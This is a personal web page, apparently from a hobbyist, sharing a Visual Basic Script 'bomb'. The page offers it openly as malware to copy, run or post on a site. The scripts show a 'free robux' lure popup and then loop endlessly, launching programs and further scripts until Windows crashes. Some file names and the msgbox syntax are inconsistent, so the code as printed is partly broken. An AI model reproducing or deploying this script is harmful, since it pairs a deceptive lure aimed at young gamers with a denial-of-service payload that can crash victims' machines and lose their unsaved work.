|
so here you can see the various scripts that ive made, grouped into different programming languages and copy and pastable so that you can run them for yourself or put them on your site. I will also be color coding them for their use except i just made this page so there is just one script. my bad COLOR CODESRed ------ malware/can damage your computer orange --- code to use in your site vvv Scripts vvv.vbs (Visual Basic Script)The bomb This script essentially makes a little windows popup that says something, and if you click yes or attempt to close out, it will immediately start repeatedly running another vbs that upon being ran, will open more windows and other programs on your computer before your computer essentially crashes from the overwhelming amount of popups and programs that have be executed, or you shutdown your computer.this script will only work with windows machines and should work with atleast windows 10 and 11. any windows machines that run windows 8.1 and older will probably not be able to run this programm because i made it run the new modern versions of stuff like calculator and edge which older windows versions dont exactly have, and i dont plan to make a fix for this either. clone.vbsx=msgbox("run this to get free robux"32,"hey man")
do
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "uh oh.vbs"
Set objShell = Nothing
loop
uhoh.vbsdo
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "calc.exe"
objShell.Run "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
objShell.Run "cheezit.vbs"
Set objShell = Nothing
loop
heres the code if you wanna nuke your computer. |
Back To Main Page